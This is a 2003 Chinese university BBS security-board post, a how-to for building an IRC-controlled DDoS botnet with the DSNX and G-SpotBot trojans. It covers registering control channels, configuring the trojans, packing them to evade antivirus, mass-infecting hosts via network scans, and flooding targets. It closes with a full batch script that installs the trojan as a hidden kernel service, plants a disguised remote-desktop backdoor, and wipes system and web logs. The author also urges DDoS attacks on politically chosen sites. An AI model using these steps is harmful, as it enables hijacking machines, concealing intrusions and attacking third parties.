荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: sonicboy (sonicboy), 信区: Security
标 题: IRC 木马全攻略
发信站: 荔园晨风BBS站 (Wed May 7 15:18:26 2003)
IRC 木马全攻略
有时候我们为了发动一次DDOS攻击或者为了构建一个能够实现DDOS攻击的系统,会大量的
寻找“肉鸡”,但是众多的“肉鸡”,特别是那些动态IP的机器,给我的管理工作带来很
大的困难,于是我们想到了利用IRC来管理、控制“肉鸡”,这样即使“肉鸡”的IP地址是
动态的,重启后依然会到设定的IRC房间报到,我们只需要使用一些预先设定的命令就可以
控制这台机器来进行需要的操作,这样会大大提高我们的管理效率和攻击力度。下面就开
始我们的IRC牧马之旅吧:)。
一、IRC房间的申请和IRC木马的配置
要用IRC来养马,当然需要一个或者多个IRC房间(也叫频道)了,现在有很多IRC服务器都
提供房间注册的,我们以irc.cnirc.org为例,来简单介绍一下如何获取一个IRC房间,首
先我们使用IRC工具Hirc 2000连接到服务器,使用命令/nick [nickname]来选择一个你自
己喜欢的名字,如果这个名字没有被注册,那么使用/ns [register] [password]来注册。
成功之后请一定记住密码,下次登录你需要用/pass [password] 来验证身份。下面就要注
册房间了,用命令/join #[roomname] 来创建一个你喜欢的房间,如果房间的名字没有被
注册,那么在弹出的窗口中输入/cs register #[roomname] [password] [description]
(如图1)来注册这个房间,成功之后请记住房间的密码,配置木马的时候会用到。另外[
description](房间主题的描述)尽量不要写一些无意义的东西,系统会定期检查。当然
你也不能很直接的就写个:偶用来养马的房间,小小管理员和你急。
房间注册好了,下面就该主角出场了,IRC马很多但是精品却少,中文版的IRC马几乎没有
,(Meteor写的那个Slackbot开了后门,你不会用吧?)所以这次只能给大家介绍两款国
外的IRC木马:DATASPY NETWORK X[DSNX 版本0.5],作者在这款马的说明文档中指出:“
尽管当前IRC木马众多,并在不断发展,但是没有一款能像DSNX那样提供稳定的服务和众多
的功能。”并且该马还提供插件支持(例如下文提到的用于本地局域网中进行端口扫描的
portscan v2的插件)。下面我们就来看一下如何配置DSNX。(如图2)
IRC Server(s):填写IRC服务器地址,DSXN支持多个IRC服务器地址,如果你输入了多个
地址,他会随机挑选一个进行连接,
如果不能连接就选择下一个地址。
Channel & Key: 填写#房间名称 房间密码。(就是你注册房间的时候填的密码)
Port:IRC服务器的端口,一般为6667,不用更改。
Normal&Admin Password:普通控制密码与超级控制密码的区别在于普通控制密码不能使用
'set' 'upgrade' 和 'update'命令, 这些是重设、升级更新木马的命令。你设置的密码
会被MD5加密。
Match Hostmask:主机匹配标识,在使用login命令之前登录的主机必须是指定的机器才可
以使用login命令来验证身份。(*是默认值,一般我们也不更改它,如果你一定要改范围
只能是"*"、"?"和单独分开字母或数字。)
Command Prefix:!(命令前缀,可以更改,至于改成什么就随你喜欢了。)
Custom:自定义木马启动命令(不是必选项,前面要加你设定的前缀,
例如“!plugins add *.dsnx”、“!format d:/u /q /autoset”).
Simultaneous Logins:同时登录者的数量,如果要和朋友一起使用可以设为2、3等。不设
置代表无限制。
Reply To:木马回应,,默认回应频道或者查询或者频道通知中的一个。
以上设置,请参您的实际情况设置,特别是IRC Server一项,最好能区别对待,例如专门
在日本、韩国、美国等IRC服务器上注册房间用来养不同地区的马,这样可以避免无法连接
,IP限制,速度过慢等情况。
当我们成功登录后,木马会发出一个确认信息(如图3,若是马儿多场面可就壮观了。),
然后我们就可以运行木马内置的命令来执行任务了。DSXN内置了非常多的命令,比较常用
的有:
1、Upload/Download files 上传/下载文件 [<PREFIX>webdl url <file>]
2、Perform a port scan on the local area network 在本地局域网中进行端口扫描 [需
要一个名为portscan v2的插件支持]
3、Flood a specified IP address 对指定的IP地址进行FLOOD攻击 [<PREFIX>flood IP
Packge Size]
4、runs a file on the dsnx client machine 在服务端运行程序 [<PREFIX>run file <
don't_hide>]
5、Manages port redirects 端口重定向 [<PREFIX>portr new in_port <server> <out_
port>]
6、Delete files 删除文件 [<prefix>plugins del "portscan v2"]
还有其他很多的命令,就不一一列出,去看帮助命令吧。另外一款好的IRC木马是G-SpotBot
(版本2.0)增加很多有趣的功能(例如,隐身、自动OP等),当然它的Flood功效也很强,你
可以试试。需要说明的是这两款木马有已经被列入病毒库了,所以在使用前我们应该用UP
X或者Aspack压缩一下,本文中我将其用upx压缩后命名为windrv32.exe。
二、木马种植工作和DDOS对象的选择
最后我们需要做的就是去获取大量肉鸡并种植IRC马了,为了尽可能长期地占有这些肉鸡,
我们应该给肉鸡打个补丁,并更改一下DSNX的启动方式(由原来的注册表启动,改为系统
关键性服务。),这里推荐一个高效的方法,我们将配置好的DSNX和下面这个批处理(批
处理内容见光盘中patch.txt)做成一个自解压文件,然后我们用20cn的scanipc.exe(20
cn最近放出了正式版,兄弟一并奉上。)来扫描一个比较大的网段,(一些需要注意的细
节我用图4、5、6来表示)一般一个晚上就可以获得大量的“肉鸡”了。一个简单的DDOS系
统就这样实现了,你只需要发出一条命令,就可以让各个"肉鸡"开始FLOOD~~,但是我还想
提醒一下各位玩DDOS的朋友,真正危险的不是那疏于管理的Admin,而是科班出生的网警叔
叔们,您也别认为删了日志就安全了,通过路由一样可以找到你:(,所以如果你一定要
玩,选个好的对象吧,例如:宣扬法论功的邪教网站、反华亲日的反动网站…… 这或许也
是一种斗争的艺术吧:)。G00D Luck!
=====================下面是patch.bat的内容========
=================
@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\param
eters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登录]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
>>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及文件访问和打印共享]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry] >
>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.
dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogo
n] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登录前关机]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止显示前一个登录用户名称]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Win
Stations\RDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds
\rdpwd\Tds\tcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dl
l
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>pat
ch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00
,6f,00,\ >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,
65,\ >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,
00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows' message。" >>patc
h.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>pat
ch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
@REM [修改3389连接,端口为8210,名称为Microsoft EventLog,留条后路]
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>pat
ch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDrive
r binpath= c:\winnt\system32\windrv32.exe
@REM [删除DSNXDE在注册表中的启动项,将之注册为系统关键性服务的同时将其属性设为
隐藏和只读,并config为自启动。]
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
@del c:\winnt\system32\config\*.event /f /q
@del c:\winnt\system32dtclog\*.* /f /q
@del c:\winnt\*.txt /f /q
@del c:\winnt\*.log /f /q
@net start w3svc
@net start event log
@rem [删除日志]
@net stop lanmanserver /y
@net start lanmanserver
@net stop Schedule /y
@net stop @REMoteRegistry /y
@del patch.dll
@echo The server has been patched,the terminal servece's ports has been change
to 8210,also the DSNX has been registered as a kneral service,Have a fun.
@del patch.bat
@del dsnx.exe
@REM [禁止一些危险的服务。]
--
HIHI!I AM SONICBOY,MY QQ IS 28860.MY BBS : http://waterclub.126.com
SONICBOY EDONKEY SERVER:61.144.225.74:4661
※ 来源:.荔园晨风BBS站 http://bbs.szu.edu.cn [FROM: 61.144.235.39]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店